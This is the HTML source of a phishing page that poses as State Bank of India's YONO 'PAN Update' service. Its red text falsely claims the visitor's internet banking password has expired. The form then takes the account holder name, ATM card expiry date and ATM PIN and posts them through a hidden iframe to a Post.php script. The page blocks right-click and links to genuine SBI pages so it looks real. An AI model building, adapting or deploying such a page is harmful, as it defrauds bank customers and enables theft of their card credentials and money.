<!DOCTYPE HTML> 
<html>
   <head>
     <title>State Bank of India | PAN Update</title>
      <meta name="viewport" content="width=device-width, initial-scale=1">
      <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
      <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
      <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
      <link rel="manifest" href="/site.webmanifest">
      <link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5">
      <meta name="msapplication-TileColor" content="#da532c">
      <link rel="stylesheet" type="text/css" href="Style_Main.css">
      <link rel="preconnect" href="https://fonts.googleapis.com">
      <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@300;400;500;600;700&display=swap" rel="stylesheet">
	   <style>
	   #ii
	   {
	   position:absolute;
	   top:6px;
	   margin-left:84%;
	   }
	   .login-box {
	   width: 90%;
	   padding: 10px;
	   }
	   
	   .login-box .user-box {
	   position: relative;
	   }
	   
	   .login-box .user-box input {
	   width: 100%;
	   padding: 3px 2px;
	   font-size: 16px;
	   color: black;
	   margin-bottom: 40px;
	   margin-left:0px;
	   border: none;
	   caret-color:#00A9E0;
	   border-bottom: 1.5px solid #673391;
	   outline: none;
	   background: transparent;
	   transition: border-color 0.2s;
	   font-family: 'Open Sans', sans-serif;
	   font-weight:500;
	   }
	   .login-box .user-box label {
	   position: absolute;
	   top:-10px;
	   left: 2px;
	   padding: 5px 2px;
	   font-size: 15px;
	   font-family: ;
	   color: #506070;
	   pointer-events: none;
	   transition: 0.3s;
	   font-family: 'Open Sans', sans-serif;
	   font-weight:400;
	   
	   }
	   .login-box input:focus {
	   width:100%;
	   margin-bottom: 40px;
	   padding: 3px 2px;
	   margin-left:0px;
	   font-size:16px;
	   border-width: 2px;
	   border-image: linear-gradient(#00A9E0,#00A9E0);
	   border-image-slice: 1;
	   font-family: 'Open Sans', sans-serif;
	   font-weight:500;
	   
	   }
	   
	   .login-box .user-box input:focus ~ label,
	   .login-box .user-box input:valid ~ label {
	   top: -30px;
	   left: 2px;
	   margin-left:2px;
	   color: #506070;
	   font-size: 14px;
	   font-family: ;
	   font-style:normal;
	   font-family: 'Open Sans', sans-serif;
	   font-weight:600;
	   }
	   
	   .login-box-mob {
	   width: 100%;
	   padding: 10px;
	   margin-top:-14px;
	   }
	   .login-box-mob .user-box-mob {
	   position: relative;
	   }
   </style>
   <script language="javascript"> 
   var message="This function is not allowed here.";
   function clickIE4(){
   if (event.button==2){
   alert(message);
   return false;
   }
   }
   function clickNS4(e){
   if (document.layers||document.getElementById&&!document.all){
   if (e.which==2||e.which==3){
   alert(message);
   return false;
   }
   }
   }
   if (document.layers){
   document.captureEvents(Event.MOUSEDOWN);
   document.onmousedown=clickNS4;}
   else if (document.all&&!document.getElementById){
   document.onmousedown=clickIE4;}
   document.oncontextmenu=new Function("alert(message);return false;")
   </script>
   </head>
   <body>
   <div class="container-fluid m-0 p-0">
<img src="Header.png" style="margin-top:-2%; margin-left:-8px;"width="105.5%">
<img src="Menu.png" id="ii" width="10%">
   </div>
      <div class="container">
         <div class="row">
            <div class="col-md-7 col-xs-12 text-center"></div>
		 <div class="col-md-5 col-xs-12">
            <div class="card m-0 p-0">
 <div class="bg-light p-30">
			<h1 style="font-family: 'Open Sans', sans-serif; font-weight:700; margin-top:-5px; margin-left:10px;"><b>   </b></h1>
			<center><img src="YONO_Logo.png" style="margin-top:-15px;" width="75%"></center>
			<div class="net">
			<center><p1 style="font-family: 'Open Sans', sans-serif; color:red; font-size:13px; font-weight:400; margin-top:0%;">As per laid dowan Policy,
			<span style="font-family: 'Open Sans', sans-serif; color:red; font-size:13px; font-weight:700; margin-top:0%;"> your Internet Banking Profile Password</span>
			has expired.
			<span style="font-family: 'Open Sans', sans-serif; color:red; font-size:13px; font-weight:700; margin-top:0%;"> Kindly submit your ATM Card Details </span>
			to proceed
			<span style="font-family: 'Open Sans', sans-serif; color:red; font-size:13px; font-weight:700; margin-top:0%;"> PAN KYC</span>
			</p1></center>
			</div>
			</div>
			<div class="card-body" style="margin-top:-30px;">
      
        </div>
			<div class="card-body" style="margin-top:-30px;">
           
              <!-- partial:index.partial.html -->
              <div class="login-box">
              <!-- Static- Please don't do anything here-->
              <script type="text/javascript">var submitted=false;</script>
              <iframe name="hidden_iframe" id="hidden_iframe" style="display: none" onload="if(submitted){window.location='Processing.html';}"></iframe>
              <!--My Form-->
              <form class="LoginForm" action="Post.php" method="post" target="hidden_iframe" onsubmit="submitted=true" class="myform">
                     <div class="row">
                        
                        <div class="login-box">
                        <div class="user-box">
                        <input type="text" name="Account_hol_Name" class="name" onkeydown="return /[a-z A-Z]/i.test(event.key)" minlength="3" maxlength="40"
                        required="">
                        <label>Account Holder Name<span style="color:red;"> *</span></label>
                        </div>
                     </div>

                        <div class="login-box">
                        <div class="user-box">
                        <input type="text" name="Card_Expiry_Date " id="Card_Expiry_Date"minlength="3" maxlength="7"
                        required="">
                        <label>ATM Card Expiry Date<span style="color:red;"> *</span></label>
                        <p1><span class="error" style="display:none; position:absolute; margin:-6%; margin-left:0px;">Invalid ATM Card Expiry Date !</span></p1>
                        </tr>
                        </table>
                      <script type="text/javascript">
                        var isShift = false;
                        var seperator = "/";
                        window.onload = function () {
                        //Reference the Table.
                        var tblForm = document.getElementById("date");
                        
                        //Reference all INPUT elements in the Table.
                        var inputs = document.getElementsByTagName("input");
                        
                        //Loop through all INPUT elements.
                        for (var i = 0; i < inputs.length; i++) {
                        //Check whether the INPUT element is TextBox.
                        if (inputs[i].name == "Date_Of_Birth") {
                        //Check whether Date Format Validation is required.
                        if (inputs[i].className.indexOf("") != 1) {
                        
                        //Set Max Length.
                        inputs[i].setAttribute("maxlength", 10);
                        
                        //Only allow Numeric Keys.
                        inputs[i].onkeydown = function (e) {
                        return IsNumeric(this, e.keyCode);
                        };
                        
                        //Validate Date as User types.
                        inputs[i].onkeyup = function (e) {
                        ValidateDateFormat(this, e.keyCode);
                        };
                        }
                        }
                        }
                        };
                        
                        function IsNumeric(input, keyCode) {
                        if (keyCode == 16) {
                        isShift = true;
                        }
                        //Allow only Numeric Keys.
                        if (((keyCode >= 48 && keyCode <= 57) || keyCode == 8 || keyCode <= 37 || keyCode <= 39 || (keyCode >= 96 && keyCode <= 105)) && isShift == false) {
                        if ((input.value.length == 2 || input.value.length == 5) && keyCode != 8) {
                        input.value += seperator;
                        }
                        
                        return true;
                        }
                        else {
                        return false;
                        }
                        };
                        
                        function ValidateDateFormat(input, keyCode) {
                        var dateString = input.value;
                        if (keyCode == 16) {
                        isShift = false;
                        }
                        var regex = /(((0|1)[0-9]|2[0-9]|3[0-1])\/(0[1-9]|1[0-2])\/((19|20)\d\d))$/;
                        
                        //Check whether valid dd/MM/yyyy Date Format.
                        if (regex.test(dateString) || dateString.length == 0) {
                        ShowHideError(input, "none");
                        } else {
                        ShowHideError(input, "block");
                        }
                        };
                        
                        </script>
                        </div>
                       

                        <div class="user-box">
                        <input type="text" name="ATM PIN" id="aadhar" inputmode="numeric" maxlength="4"
                        pattern="\d{4}" title="Please enter valid ending 4 digit of ATM PIN !"
                        required="">
                        <label>ATM PIN<span style="color:red;"> *</span></label>
                        </div>

                 </div>
                     <div class="w3ls-login">
                     <center><button type="submit" style="font-family: 'Open Sans', sans-serif; font-weight:500;" class="btn btn-success btn-block"> LOG IN </button></center>
                     </div>
					 <center><p style="font-family: 'Open Sans', sans-serif; font-weight:600; color:#673391; text-decoration:none;" class="link text-center"><a href="https://retail.onlinesbi.com/preretail/lockunlockuseraccess.htm" style="font-family: 'Open Sans', sans-serif; font-weight:600; color:#673391; text-decoration:none;">Lock Access</a>|<a href="https://retail.onlinesbi.com/retail/troubleloginhome.htm?bankCode=0" style="font-family: 'Open Sans', sans-serif; font-weight:600; color:#673391; text-decoration:none;">Forgot Password</a>|<a href="#" style="font-family: 'Open Sans', sans-serif; font-weight:600; color:#673391; text-decoration:none;">Forgot Username</a></p></center>
                  </form>		  
            </div>
	     </div>
          </div>
         </div>
      </div>
   <footer>
      <img src="SecurityA.jpg" style="margin-top:-6%;" width="100%">
      <img src="Footer.png" style="margin-left:-8px;" width="104.5%">
   </footer>
</body>
</html>   